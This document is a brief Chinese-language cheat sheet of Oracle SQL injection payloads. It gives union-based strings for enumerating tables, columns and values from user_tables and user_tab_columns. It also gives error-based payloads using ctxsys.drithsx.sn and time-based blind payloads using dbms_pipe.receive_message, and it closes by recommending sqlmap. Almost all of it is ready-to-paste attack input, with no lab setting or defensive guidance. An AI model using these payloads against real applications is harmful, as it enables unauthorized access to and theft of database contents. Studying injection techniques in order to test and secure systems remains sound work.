一、union注入
判断字段数量
order by 4
判断回显字段(先使用null进行填充)
union select 1,null from dual
查询表名
第一行表:union select null,(select table_name from user_tables where rownum=1) from dual
第二行及以后表:union select null,(select table_name from(select rownum no,table_name from user_tables) where no=2) from dual
查询列名
第一列:union select 1,(select column_name from user_tab_columns where table_name='test3' and rownum=1) from dual
第二列及以后列:union select null,(select column_name from(select rownum no,column_name from user_tab_columns) where no=2) from dual
查询字段值
union select null,(select "test33" from "test3") from dual
二、oracle报错注入
or 1=ctxsys.drithsx.sn(1,(select user from dual)) ‐‐
or 1=ctxsys.drithsx.sn(1,(select (select table_name from user_tables where rownum=1) from
dual)) ‐‐
三、盲注
一些盲注函数:
and 1= dbms_pipe.receive_message('xxx', 1)‐‐
and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',2),0) from
dual) ‐‐
推荐:使用sqlmap